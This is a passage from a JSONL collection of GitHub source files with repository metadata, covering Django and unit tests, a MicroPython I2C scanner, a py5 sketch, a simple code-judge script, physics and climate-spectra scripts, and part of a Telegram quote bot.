self.assertEqual(\n Post.objects.get(pk=FormTests.post.id).text,\n FormTests.comment_text_modified,\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_entities_modification(self):\n \"\"\"\n Отправка валидной формы со страницы редактирования поста.\n \"\"\"\n self.entities_modification_post()\n","repo_name":"bitbybit/hw05_final","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36528114334","text":"\"\"\"Unit tests for cli/enqueue_task.py\"\"\"\n# pylint: disable=no-self-use,protected-access\nfrom multiprocessing import JoinableQueue\nimport time\nfrom typing import Any, Dict\nimport unittest\nfrom unittest import mock\n\nimport boto3\n\nfrom cli import enqueue_task\n\n\nclass MockQueue:\n \"\"\"Mock SQS queue which fails half of the messages it sends.\"\"\"\n\n def __init__(self):\n self._calls = []\n\n def send_messages(self, **kwargs) -> Dict[str, Any]:\n \"\"\"Even messages send successfully, odd are failures\"\"\"\n entries = kwargs['Entries']\n self._calls.append(entries)\n result = {\n 'Successful': [],\n 'Failed': []\n }\n\n for i, entry in enumerate(entries):\n if i % 2 == 0:\n result['Successful'].append({'Id': entry['Id']})\n else:\n result['Failed'].append({'Id': 
entry['Id']})\n return result\n\n\nclass MockTask:\n \"\"\"Mock executable task for worker process\"\"\"\n\n @staticmethod\n def run(queue: Any) -> None:\n pass\n\n\nclass EnqueueTaskTest(unittest.TestCase):\n \"\"\"Unit tests for EnqueueTask class.\"\"\"\n\n @mock.patch.object(time, 'sleep')\n def test_task_run(self, mock_sleep: mock.MagicMock) -> None:\n \"\"\"Execute the task - messages send to queue, retrying on failure\"\"\"\n queue = MockQueue()\n task = enqueue_task.EnqueueTask(['A', 'B', 'C', 'D', 'E'])\n task.run(queue)\n\n # Failed messages should be retried\n expected = [\n [\n {'Id': '0', 'MessageBody': 'A'},\n {'Id': '1', 'MessageBody': 'B'},\n {'Id': '2', 'MessageBody': 'C'},\n {'Id': '3', 'MessageBody': 'D'},\n {'Id': '4', 'MessageBody': 'E'},\n ],\n [\n {'Id': '0', 'MessageBody': 'B'},\n {'Id': '1', 'MessageBody': 'D'},\n ],\n [\n {'Id': '0', 'MessageBody': 'D'},\n ]\n ]\n self.assertEqual(expected, queue._calls)\n mock_sleep.assert_called()\n\n\nclass WorkerTest(unittest.TestCase):\n \"\"\"Unit tests for Worker class.\"\"\"\n\n @mock.patch.object(boto3, 'resource')\n def test_worker_run(self, mock_resource: mock.MagicMock) -> None:\n \"\"\"A worker process should iterate over the task queue\"\"\"\n task_queue = JoinableQueue()\n worker = enqueue_task.Worker('queue_name', task_queue)\n mock_resource.assert_called()\n\n # Add mock task to queue, followed by None\n task_queue.put(MockTask())\n task_queue.put(None)\n\n # Worker process should terminate and the task queue should be empty\n worker.run()\n task_queue.join()\n","repo_name":"airbnb/binaryalert","sub_path":"tests/cli/enqueue_task_test.py","file_name":"enqueue_task_test.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":1369,"dataset":"github-code","pt":"68"} +{"seq_id":"13556638686","text":"import machine\n \nsdaPIN=machine.Pin(18) \nsclPIN=machine.Pin(19)\n \ni2c=machine.I2C(1,sda=sdaPIN, scl=sclPIN, freq=400000) \n \ndevices = i2c.scan()\nif len(devices) == 0:\n print('14CORE - i2c Finder / Scanner ')\n print(\"Error: No i2c device found, check properly the wiring!\")\nelse:\n print('14CORE - i2c Finder / Scanner ')\n print('i2c devices found:',len(devices))\nfor device in devices:\n print(\"i2C Address: \",hex(device))","repo_name":"fran-janela/pfe-embedded-system","sub_path":"bme280/i2C_scanner.py","file_name":"i2C_scanner.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13652273569","text":"\"\"\"2023-04-28\"\"\"\nfrom helpers import HEIGHT\nfrom helpers import save_frame\nfrom helpers import save_gif\nfrom helpers import tmp_path\nfrom helpers import WIDTH\nfrom helpers import write_legend\nfrom pathlib import Path\n\nimport py5\n\n\nIMG_NAME = Path(__file__).name.replace(\".py\", \"\")\n\nFUNDO = py5.color(248, 254, 200)\n\nPATH = tmp_path()\n\nFRAMES = []\n\n\ndef settings():\n py5.size(WIDTH, HEIGHT)\n\n\ndef setup():\n py5.background(FUNDO)\n py5.frame_rate(3)\n\n\ndef shape(xi, yi, xf, yf, largura, cor):\n largura = largura / 2\n noise = largura / 3\n xi0 = xi - largura\n xi1 = xi + largura\n xf0 = xf - largura\n xf1 = xf + largura\n py5.no_stroke()\n py5.fill(*cor)\n yi = int(yi)\n yf = int(yf)\n with py5.begin_shape():\n py5.vertex(xi0, yi)\n py5.vertex(xi1, yi)\n for y in range(yi, yf, -3):\n x = py5.random(-noise, noise) + xi1\n py5.vertex(x, y)\n py5.vertex(xf1, yf)\n py5.vertex(xf0, yf)\n for y in range(yf, yi, 3):\n x = py5.random(-noise, 
noise) + xf0\n py5.vertex(x, y)\n\n\ndef galho(y, tamanho, encurtamento, limite, atual=0):\n stroke_weight = tamanho / 10\n if stroke_weight < 1.2:\n cor = (60, 180, 0)\n else:\n cor = (66, 40, 14)\n shape(0, y, 0, y - tamanho, stroke_weight, cor)\n atual += 1\n angulo = py5.radians(17)\n if atual < limite and tamanho > 5:\n encurtamento -= 0.01\n with py5.push_matrix():\n py5.translate(0, y - tamanho)\n py5.rotate(angulo)\n galho(\n 0, (tamanho * encurtamento) - py5.random(3), encurtamento, limite, atual\n )\n py5.rotate(2 * -angulo)\n galho(\n 0, (tamanho * encurtamento) - py5.random(3), encurtamento, limite, atual\n )\n\n\ndef draw():\n diametro = 10\n py5.background(FUNDO)\n write_legend([\"#000000\"], IMG_NAME)\n angulo = 30\n passos = 360 // angulo\n frame = py5.frame_count\n with py5.push_matrix():\n py5.translate(WIDTH / 2, HEIGHT / 2)\n py5.rotate(py5.radians(frame))\n for passo in range(0, passos):\n tamanho = 80 if passo % 2 else 60\n encurtamento = 0.85 if passo % 2 else 0.95\n galho(-diametro, tamanho, encurtamento, limite=frame)\n py5.rotate(py5.radians(angulo))\n FRAMES.append(save_frame(PATH, IMG_NAME, frame))\n py5.window_title(f\"FR: {py5.get_frame_rate():.1f} | Frame Count: {frame}\")\n\n\ndef key_pressed():\n if py5.key == \" \":\n py5.no_loop()\n print(f\"Saving {len(FRAMES)} frames\")\n save_gif(IMG_NAME, FRAMES, loop=None)\n py5.exit_sketch()\n\n\npy5.run_sketch()\n","repo_name":"ericof/sketch-a-day","sub_path":"2023-05-01.py","file_name":"2023-05-01.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"32760115600","text":"import mysql.connector\nimport time\nimport sys\nimport os\nimport shutil\nimport urllib.request\n\ndef db_connect():\n user='root'\n pwd='metis'\n host='localhost'\n db='db_ai'\n try:\n database=mysql.connector.connect(user=user,password=pwd,host=host,database=db)\n except mysql.connector.Error as err:\n print(\"connect database failed.\")\n print(\"Error: {}\".format(err.msg))\n sys.exit()\n return database\n\nfile_root=\"b:\\\\\"\ncom_root=\"b:\\com\\\\\"\n\ndef create_directory(a,b):\n if not os.path.exists(str(a)+str(b)):\n os.mkdir(str(a)+str(b))\n\ndef compile_code(uid,version,code):\n create_directory(file_root,uid);\n path=file_root+\"\\\\\"+str(uid)\n os.chdir(path)\n \n f=open(str(version)+\".cpp\",\"w\");\n f.write(code);\n f.close();\n\n os.chdir(com_root)\n f=open(str(version)+\".cpp\",\"w\");\n f.write(code);\n f.close();\n if os.system(\"g++ {0}.cpp -o {0} 2> compileinfo\".format(str(version)))!=0:\n shutil.copy(\"compileinfo\",path+\"\\\\compileinfo{}.txt\".format(version))\n return False\n #compile error\n shutil.copy(\"{}.exe\".format(str(version)),path)\n return True\n\ndef change_status(db,pid,status,status_description=\"\"):\n sql=\"update tProg set status_code='{0}',status='{2}' where PID='{1}'\".format(status,pid,status_description)\n print(sql)\n c=db.cursor();\n c.execute(sql)\n\ndef query_tProg(db):\n c=db.cursor();\n sql=\"select PID,code,UID,version from tProg where status_code='0' order by submitted_on asc limit 0,1\";\n a=c.execute(sql);\n for row in c.fetchall():\n pid=row[0]\n code=urllib.request.unquote(row[1])\n uid=row[2]\n version=row[3]\n change_status(db,pid,1)\n if compile_code(uid,version,code):\n change_status(db,pid,2,\"0%\")\n #create_bettle()\n else:\n change_status(db,pid,10)\n\ndb=db_connect();\nwhile True:\n query_tProg(db)\n \n 
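# wait before polling the submissions table again\r\n    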
time.sleep(5)\n","repo_name":"MetisAI/MetisAIPlatform","sub_path":"htdocs/Judge/Metis.py","file_name":"Metis.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19525520104","text":"from django.urls import path\nfrom ghostpost_app import views\n\n\nurlpatterns = [\n path('', views.index, name='homepage'),\n path('addpost/', views.addpost, name='addpost'),\n path('up_vote//', views.for_up_vote, name='up_vote_int'),\n path('down_vote//', views.for_down_vote, name='down_vote_int'),\n path('up_vote//', views.for_up_vote, name='up_vote_str'),\n path('down_vote//', views.for_down_vote, name='down_vote_str'),\n path('posts//', views.post_details, name='posts'),\n path('posts//', views.magic_post, name='magic_post'),\n path('delete//', views.delete_post, name='delete_post'),\n]\n","repo_name":"luisfff29/ghostpost","sub_path":"ghostpost_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41842133953","text":"import unittest as ut\nimport unittest_decorators as utx\nimport numpy as np\nimport espressomd\nimport espressomd.lb\nfrom itertools import product\n\n\n@utx.skipIfMissingFeatures([\"EXTERNAL_FORCES\"])\nclass LBSwitchActor(ut.TestCase):\n system = espressomd.System(box_l=[10.0, 10.0, 10.0])\n\n system.time_step = 0.01\n system.cell_system.skin = 0.1\n\n def switch_test(self, GPU=False):\n system = self.system\n system.actors.clear()\n system.part.add(pos=[1., 1., 1.], v=[1., 0, 0], fix=[1, 1, 1])\n ext_force_density = [0.2, 0.3, 0.15]\n\n lb_fluid_params = {'agrid': 2.0, 'dens': 1.0, 'visc': 1.0, 'tau': 0.03}\n friction_1 = 1.5\n friction_2 = 4.0\n\n if GPU:\n lb_fluid_1 = espressomd.lb.LBFluidGPU(**lb_fluid_params)\n lb_fluid_2 = espressomd.lb.LBFluidGPU(**lb_fluid_params)\n else:\n lb_fluid_1 = espressomd.lb.LBFluid(**lb_fluid_params)\n lb_fluid_2 = espressomd.lb.LBFluid(**lb_fluid_params)\n\n system.actors.add(lb_fluid_1)\n system.thermostat.set_lb(LB_fluid=lb_fluid_1, gamma=friction_1)\n\n system.integrator.run(1)\n\n force_on_part = -friction_1 * np.copy(system.part[0].v)\n\n np.testing.assert_allclose(np.copy(system.part[0].f), force_on_part)\n\n system.integrator.run(100)\n self.assertNotAlmostEqual(lb_fluid_1[3, 3, 3].velocity[0], 0.0)\n\n system.actors.remove(lb_fluid_1)\n\n system.part[0].v = [1, 0, 0]\n system.integrator.run(0)\n\n np.testing.assert_allclose(np.copy(system.part[0].f), 0.0)\n\n system.actors.add(lb_fluid_2)\n system.thermostat.set_lb(LB_fluid=lb_fluid_2, gamma=friction_2)\n\n for p in product(range(5), range(5), range(5)):\n np.testing.assert_allclose(\n np.copy(lb_fluid_2[p].velocity), np.zeros((3,)))\n\n system.part[0].v = [1, 0, 0]\n\n system.integrator.run(1)\n\n np.testing.assert_allclose(\n np.copy(system.part[0].f), [-friction_2, 0.0, 0.0])\n\n def test_CPU_LB(self):\n self.switch_test()\n\n @utx.skipIfMissingGPU()\n def test_GPU_LB(self):\n self.switch_test(GPU=True)\n\n\nif __name__ == \"__main__\":\n ut.main()\n","repo_name":"Khayrulbuet13/EspressoMD","sub_path":"EspressoMD-4.1.4/testsuite/python/lb_switch.py","file_name":"lb_switch.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30959596508","text":"#!/bin/env python\n\n#SBATCH --job-name=full_plot\n#SBATCH --output=full_plot_%j.out\n#SBATCH --time=20:00:00\n#SBATCH 
--partition=broadwl\n#SBATCH --nodes=1\n#SBATCH --mem=0\n\n# coding: utf-8\n\n# In[1]:\n\n# this file plots the original simulations\n# last edited by Claire Valva on February 23, 2019\n\n\n\n# import packages\nimport numpy as np\nfrom scipy.signal import get_window, csd\nfrom scipy.signal.windows import hann, hanning, nuttall, flattop\nfrom scipy.fftpack import fft, ifft, fftfreq, fftshift, ifftshift\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport scipy.integrate as sciint\nimport pandas as pd\nimport datetime\nimport matplotlib.cm as cm\nfrom math import pi\nimport matplotlib.ticker as tck\nfrom sympy import solve, Poly, Eq, Function, exp, re, im\nfrom netCDF4 import Dataset, num2date # This is to read .nc files and time array\nfrom scipy.optimize import fsolve\nfrom decimal import Decimal\nimport pickle\nimport multiprocessing as mp\nfrom joblib import Parallel, delayed\nimport matplotlib.colors as colors\nfrom seaborn import cubehelix_palette #for contour plot colors\nimport seaborn as sns\nimport numpy.ma as ma\n\nseasons = [\"winter\", \"spring\", \"summer\", \"fall\"]\ndef add_cyclic_point(data, coord=None, axis=-1):\n    \"\"\"\n    Add a cyclic point to an array and optionally a corresponding\n    coordinate.\n\n    \"\"\"\n    \n    if coord is not None:\n        if coord.ndim != 1:\n            raise ValueError('The coordinate must be 1-dimensional.')\n        if len(coord) != data.shape[axis]:\n            raise ValueError('The length of the coordinate does not match '\n                             'the size of the corresponding dimension of '\n                             'the data array: len(coord) = {}, '\n                             'data.shape[{}] = {}.'.format(\n                             len(coord), axis, data.shape[axis]))\n        delta_coord = np.diff(coord)\n        if not np.allclose(delta_coord, delta_coord[0]):\n            raise ValueError('The coordinate must be equally spaced.')\n        new_coord = ma.concatenate((coord, coord[-1:] + delta_coord[0]))\n    slicer = [slice(None)] * data.ndim\n    try:\n        slicer[axis] = slice(0, 1)\n    except IndexError:\n        raise ValueError('The specified axis does not correspond to an '\n                         'array dimension.')\n    new_data = ma.concatenate((data, data[slicer]), axis=axis)\n    if coord is None:\n        return_value = new_data\n    else:\n        return_value = new_data, new_coord\n    return return_value\n\ndef padded(to_pad, max_len):\n    length = len(to_pad)\n    zeros = max_len - length\n    to_pad = list(to_pad)\n    for i in range(zeros):\n        to_pad.append(0)\n    return to_pad\n\n# In[3]:\nzonal_spacing = fftfreq(240,1.5)\nzonal_spacing = 1/zonal_spacing\nzonal_spacing= 360 / zonal_spacing\n\n\n# In[4]:\n\n# get file names for detrending\nfrom os import walk\n\nf = []\nfor (dirpath, dirnames, filenames) in walk('gphfiles/'):\n    f.extend(filenames)\n    break\n\nfor wantfile in range(len(f)):\n    \n    # Access data store\n    data_store = pd.HDFStore('new_detrend_' + str(f[wantfile][-10:-5]) + '.h5')\n\n    # Retrieve data using key\n    untrend_df = data_store['untrend_geopot']\n    data_store.close()\n    \n    # compute per-(year, lon, season) seasonal means and anomalies\n    untrend_df[\"seasonmean\"] = untrend_df.groupby(by=['year','lon','season'])['adj_z'].transform('mean')\n    untrend_df[\"diff_mean\"] = untrend_df[\"adj_z\"] - untrend_df[\"seasonmean\"]\n    \n    # split dataframe into pieces so can perform fft\n    untgroup = untrend_df.groupby([\"year\",\"season\", \"lon\"]) \n    other_inds = untrend_df.groupby([\"year\",\"season\"]).apply(lambda x: x.name) \n    z_only = untgroup[\"diff_mean\"]\n    z_names = z_only.apply(lambda x: x.name)\n\n    # get each longitude of each group\n    grouped_a = [z_only.get_group(name) for name in z_names]\n\n    ind_match = [[group for 
group in z_names \n if group[0] == other[0] \n and group[1] == other[1]] \n for other in other_inds]\n\n grouped_b = [[z_only.get_group(name) for name in sublist] \n for sublist in ind_match]\n grouped_b = np.real(grouped_b)\n\n bglist = [[list(item) for item in sublist] for sublist in grouped_b]\n\n d2_trans = [np.fft.fft2(sublist) for sublist in bglist]\n\n d2_touse = d2_trans[0:len(d2_trans)-1]\n d2_seasons = [[d2_touse[i] for i in range(len(d2_touse)) \n if other_inds[i][1] == part] for part in seasons]\n\n\n\n\n\n len_list = [[len(entry[0]) for entry in season] for season in d2_seasons]\n max_len = [max(entry) for entry in len_list]\n padded_lists = [[[padded(row, max_len[i]) for row in entry] \n for entry in d2_seasons[i]] for i in range(4)]\n\n d2_averages = [np.average(entry, axis = 0) for entry in padded_lists]\n\n #save spectra:\n tosave = [d2_touse, d2_seasons, d2_averages]\n\n file_name = \"spectra_02_\" + str(f[wantfile][-10:-5]) + \"arr.pickle\"\n file_pickle = open(file_name, \"wb\")\n pickle.dump(tosave, file_pickle)\n\n season_titles = [\"Winter\", \"Spring\", \"Summer\", \"Fall\"]\n\n def spec_plot(title = 0, data = d2_averages[0], levels = \"no\", save = False, name = None):\n\n #select a season for plotting\n test_dat = data\n frequencies = fftfreq(len(test_dat[1]), 0.25)\n \n #set what you wanna crop\n max_z = 40\n max_f = 1\n\n #crop the data, only keep the positive frequencies\n cropped = [[test_dat[i][j] for i in range(len(zonal_spacing)) \n if zonal_spacing[i] <= max_z and zonal_spacing[i] >= 0]\n for j in range(len(frequencies)) \n if np.abs(frequencies[j]) <= max_f]\n\n cropf = [counted for counted in frequencies if np.abs(counted) <= max_f]# and counted != 0]\n cropz = [zonal_spacing[i] for i in range(len(zonal_spacing)) \n if zonal_spacing[i] <= max_z and zonal_spacing[i] >= 0]\n\n x = cropf\n y = cropz\n X, Y = np.meshgrid(x,y)\n X = np.flip(X,1)\n Z = np.transpose(np.abs(cropped))\n\n # add cyclic point for plotting purposes\n x = np.array(x)\n testZ = [fftshift(entry) for entry in Z]\n testZ = np.array(testZ)\n\n dataout, lonsout = add_cyclic_point(testZ,fftshift(x))\n x = lonsout\n y = y\n X, Y = np.meshgrid(x,y)\n X = np.flip(X,1)\n\n # set colors and levels for discrete values\n # colors_set = cubehelix_palette(10)\n colors_set = sns.cubehelix_palette(10, start=2, rot=0, dark=0, light=.95)\n \n if levels == \"no\":\n # set colors and levels for discrete values\n level_set_less = [np.percentile(dataout, j*10) for j in range(1,11)]\n for j in range(1,5):\n level_set_less.append(np.percentile(dataout, 90 + 2*j))\n #level_set_less = flatten(level_set_less)\n level_set_less.sort()\n levels_rec.append(level_set_less)\n \n else:\n level_set_less = levels\n \n colors_set = sns.palplot(sns.color_palette(\"hls\", len(level_set_less)))\n colors_set = sns.cubehelix_palette(14, start=2, rot=0, dark=0, light=.95)\n colors_set = sns.color_palette(\"cubehelix\", 14)\n\n # plot it\n plt.clf();\n plt.figure(figsize=(15, 5), constrained_layout=True);\n # actual plot\n\n CF = plt.contourf(X,Y,dataout, colors = colors_set, levels = level_set_less,)\n\n # set colorbars\n\n CBI = plt.colorbar(CF)\n ax = CBI.ax\n ax.text(-2.5,0.8,'Coefficient magnitude',rotation=90)\n \n # ax.yaxis.get_offset_text().set_position((-3, 5))\n\n labels = [\"{:.1E}\".format(Decimal(entry)) for entry in level_set_less]\n\n CBI.set_ticklabels(labels)\n # plot labels\n plt.xlabel(r\"Frequency (day$^{-1}$)\")\n plt.ylim(ymax = 25, ymin = 3)\n plt.xlim(xmax = 0.75, xmin = -0.75)\n plt.ylabel(\"Zonal 
wavenumber\")\n plt.title(str(title) + \" climatology of geopotential height spectra\", pad = 15)\n\n # formatting\n sns.set_style(\"ticks\")\n sns.set_context(\"poster\")\n sns.despine()\n \n if save == True:\n \n plt.savefig(name, bbox_inches = \"tight\")\n\n # plt.show()\n \n levels_rec = []\n\n for j in range(4):\n name = \"spec_plots/02_test_spectra_\" + seasons[i] + \"_\"+ str(f[wantfile][-10:-5]) + \".png\"\n title = str(f[wantfile][-10:-5]) + \" \"+ season_titles[i] \n spec_plot(title , d2_averages[i], name = name, save = True)\n \n actual_levels = np.average(levels_rec, axis = 0)\n\n for i in range(4):\n name = \"spec_plots/02_test_spectra_\" + seasons[i] + \"_\"+ str(f[wantfile][-10:-5]) + \".png\"\n title = str(f[wantfile][-10:-5]) + \" \"+ season_titles[i]\n spec_plot(title , d2_averages[i], levels = actual_levels, name = name, save = True)\n","repo_name":"clairevalva/wavy-sims","sub_path":"lin-assumption-2/plotter-Copy1.py","file_name":"plotter-Copy1.py","file_ext":"py","file_size_in_byte":8913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22376707603","text":"# 给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和。\n\n\nclass Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n return_value = nums[0]\n sum = 0\n for each in nums:\n if sum < 0:\n sum = 0\n sum += each\n if sum > return_value:\n return_value = sum\n return return_value\n\n\nsol = Solution()\na = [1, 2]\n\nres = sol.maxSubArray(a)\nprint(res)\n","repo_name":"Colaplusice/algorithm_and_data_structure","sub_path":"LeetCode/week_36/53_最大子序和.py","file_name":"53_最大子序和.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38238023651","text":"#!/usr/bin/env python3\n# -*- encoding: utf8 -*-\n\n\"\"\"ASkiBot, cloned from IRC to TG because newfags can't even.\"\"\"\n\nimport tgbot\nimport logging\nimport socket\nimport threading\nimport time\nimport random\nimport errno\nimport pickle\nimport collections\n\nTOKEN_TXT = 'token.txt'\nKEULII_TXT = 'keulii.txt'\nQUOTES_DIR = 'quotes'\nMOPOPOSTERPORT = 6688\n\nclass Mopoposter:\n \"\"\"Simple message receiver on a tcp socket.\n\n Keulii messages go here too in realtime.\n They get logged to a file elsewhere.\n\n Listen for messages on new connections.\n One message per connection, closed automatically.\n Messages sent to a callback.\n \"\"\"\n ENCODING = 'latin-1'\n def __init__(self, port, sendfunc):\n self.port = port\n self.sendfunc = sendfunc\n self.serversocket = None\n self.thread = None\n\n def start(self):\n self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.serversocket.bind(('127.0.0.1', self.port))\n self.serversocket.listen(20)\n\n self.thread = threading.Thread(target=self.acceptLoop)\n self.thread.start()\n\n def acceptLoop(self):\n while True:\n try:\n (clientsocket, address) = self.serversocket.accept()\n except OSError as err:\n if err.errno == errno.EINVAL:\n # invalid argument, servsocket closed\n break\n if err.errno == errno.EBADF:\n # bad file descriptor also equals to closing\n break\n raise\n\n self.handleConnection(clientsocket)\n\n def handleConnection(self, sock):\n sock.settimeout(5.0)\n try:\n msg = sock.recv(1024)\n except socket.timeout:\n # just clean up\n pass\n else:\n if len(msg) > 0:\n self.sendfunc(msg.decode(self.ENCODING))\n 
finally:\n sock.shutdown(socket.SHUT_RDWR)\n sock.close()\n\n def stop(self):\n if self.serversocket:\n self.serversocket.shutdown(socket.SHUT_RDWR)\n self.serversocket.close()\n if self.thread:\n self.thread.join()\n\nclass QuotesBase:\n \"\"\"Get a random quote for a chat channel.\"\"\"\n TIME_LIMIT = 15*60\n ERR_MSG = 'Elä quottaile liikaa'\n\n def __init__(self):\n self.last_requests = {}\n\n def get(self, chan_id, user_id, search_term):\n \"\"\"Public api to get one message; search term is for whole lines.\n\n The number of gets is restricted to one within the time limit for a\n single user, unless another user asks for one; then the limit starts\n for that user.\"\"\"\n now = time.time()\n last_user, last_time = self.last_requests.get(chan_id, (None, 0))\n if user_id == last_user and now - last_time < self.TIME_LIMIT:\n return (user_id, self.ERR_MSG)\n\n msg = self._search(chan_id, search_term)\n # the user can try again if nothing was found\n if msg is not None:\n self.last_requests[chan_id] = (user_id, now)\n return (chan_id, msg)\n\n return (chan_id, None)\n\n def _search(self, chan_id, term):\n \"\"\"Find that message on a chat channel.\"\"\"\n term = term.lower().strip()\n lines = [x.strip() for x in self._listQuotes(chan_id)\n if term in x.lower()]\n return random.choice(lines) if len(lines) else None\n\n def _listQuotes(self):\n \"\"\"Subclasses should do this\"\"\"\n raise NotImplementedError\n\nclass Keulii(QuotesBase):\n \"\"\"One global quotefile for all chats.\n\n Time limit is still per chat.\n Adding not supported, since it's done elsewhere.\n They're just read in here.\n \"\"\"\n def __init__(self, filename):\n super().__init__()\n self.filename = filename\n\n def _listQuotes(self, chan_id):\n try:\n # FIXME utf8\n with open(self.filename, encoding='latin-1') as fh:\n return list(fh)\n except IOError:\n return []\n\nclass Quotes(QuotesBase):\n \"\"\"Unique quote file for each chat.\"\"\"\n def __init__(self, quotefile_dir):\n super().__init__()\n self.quotefile_dir = quotefile_dir\n\n def _listQuotes(self, chan_id):\n try:\n with open('%s/%s' % (self.quotefile_dir, chan_id), 'rb') as fh:\n return pickle.load(fh)\n except IOError:\n return []\n\n def addQuote(self, chan_id, quote):\n quotes = self._listQuotes(chan_id)\n quotes.append(quote)\n with open('%s/%s' % (self.quotefile_dir, chan_id), 'wb') as fh:\n pickle.dump(quotes, fh)\n\n\nclass TgQuote(collections.namedtuple('TgQuoteBase', 'origin msgid text adder')):\n def strip(self):\n return self\n\n def lower(self):\n return self\n\n def __contains__(self, item):\n # origin is always a user; try all of those three for easier searching\n return item in ('%s %s %s %s' % (\n self.origin.get('username', ''),\n self.origin.get('first_name', ''),\n self.origin.get('last_name', ''),\n self.text)).lower()\n\ndef quotemerge(a, b, result):\n a = pickle.load(open(a, 'rb'))\n b = pickle.load(open(b, 'rb'))\n pickle.dump(a + b, open(result, 'wb'))\n\ndef getUserDesc(user):\n \"\"\"Either \"username\" or \"first last\" (one of those should exist)\n\n Use only for human interaction, not for detecting stuff like with IDs\"\"\"\n return user.get('username',\n '%s %s' % (\n user.get('first_name', ''),\n user.get('last_name', '')))\n\ndef getChatDesc(chat):\n \"\"\"Either chat title or the user if it's a personal 1-on-1 chat\n\n Use only for human interaction, not for detecting stuff like with IDs\"\"\"\n return chat.get('title', getUserDesc(chat))\n\n\nclass AskibotTg:\n MOPOPOSTER_SAVE_FILENAME = 'mopoposter.pickle'\n def 
__init__(self, connection, keuliifilename, mopoposterport, quotesdir):\n self.conn = connection\n self.update_offset = 0\n\n try:\n with open(self.MOPOPOSTER_SAVE_FILENAME, 'rb') as fh:\n self.mopoposter_broadcast = pickle.load(fh)\n except IOError:\n self.mopoposter_broadcast = {}\n self.mopoposter = Mopoposter(mopoposterport, self.sendMopoposter)\n self.keulii = Keulii(keuliifilename)\n self.quotes = Quotes(quotesdir)\n # record the last /addq place to save the quote to the right place when\n # forwarded to the bot.\n self.last_addq_chat = {}\n\n self.running = False\n\n me = self.conn.getMe()\n self.username = me['username']\n\n def saveMopoposterBroadcast(self):\n try:\n with open(self.MOPOPOSTER_SAVE_FILENAME, 'wb') as fh:\n pickle.dump(self.mopoposter_broadcast, fh)\n except IOError:\n logging.error('Cannot open mopoposter save %s' % self.MOPOPOSTER_SAVE_FILENAME)\n\n def helpMsg(self):\n return '''Olen ASkiBot, killan irkistä tuttu robotti. Living tissue over metal endoskeleton.\n\n/keulii HAKUTEKSTI - Hae mopopostereista tekstinpätkää, hakutekstillä tai ilman.\n/keuliiregister - Rekisteröi tämä kanava reaaliaikaiseksi mopoposterikuuntelijaksi.\n/keuliiunregister - Kumoa rekisteröinti, viestejä ei enää tule. Sallittu vain rekisteröijälle ja ylläpitäjälle.\n\n/q HAKUTEKSTI - kuin mopoposter, mutta kanavakohtaisille quoteille.\n/addq - merkitse lisättävä quote tälle kanavalle. Lisää se sitten forwardaamalla yksityisesti botille.\n\nBottia ylläpitää sooda. https://github.com/sooda/askibot-tg\n'''\n\n def run(self):\n \"\"\"Start the main loop that goes on until user ^C's this.\"\"\"\n self.running = True\n try:\n self.mopoposter.start()\n self.loopUpdates()\n except KeyboardInterrupt:\n pass\n\n self.mopoposter.stop()\n\n def stop(self):\n # just for the tests\n self.running = False\n\n def sendMopoposter(self, msg):\n \"\"\"Got a message, broadcast it to the listeners.\"\"\"\n for chatid in self.mopoposter_broadcast.keys():\n self.conn.sendMessage(chatid, 'KEULII! ' + msg)\n\n def loopUpdates(self):\n while self.running:\n # btw, looks like the server timeouts with status ok and an empty\n # result set after just 20 seconds\n for update in self.conn.getUpdates(\n offset=self.update_offset, timeout=60):\n self.handleUpdate(update)\n\n def handleUpdate(self, update):\n \"\"\"Got one line from the server.\"\"\"\n upid = update['update_id']\n try:\n msg = update['message']\n except KeyError:\n logging.warning(\"what?? no message in update: <%s>\" % update)\n else:\n self.handleMessage(msg)\n self.update_offset = upid + 1\n\n def handleMessage(self, msg):\n \"\"\"Manage the message itself; just pass it around to a handler.\"\"\"\n if 'text' in msg:\n text = msg['text']\n commands = {\n '/help': self.cmdHelp,\n '/start': self.cmdStart,\n '/keulii': self.cmdKeulii,\n '/keuliiregister': self.cmdKeuliiRegister,\n '/keuliiunregister': self.cmdKeuliiUnRegister,\n '/mopoposterpost': self.cmdMopoposterPost,\n '/q': self.cmdQuote,\n '/addq': self.cmdAddQuote,\n }\n\n if 'forward_from' in msg:\n # this is a private message; from and chat are the same (the\n # bot can't see public ones). 
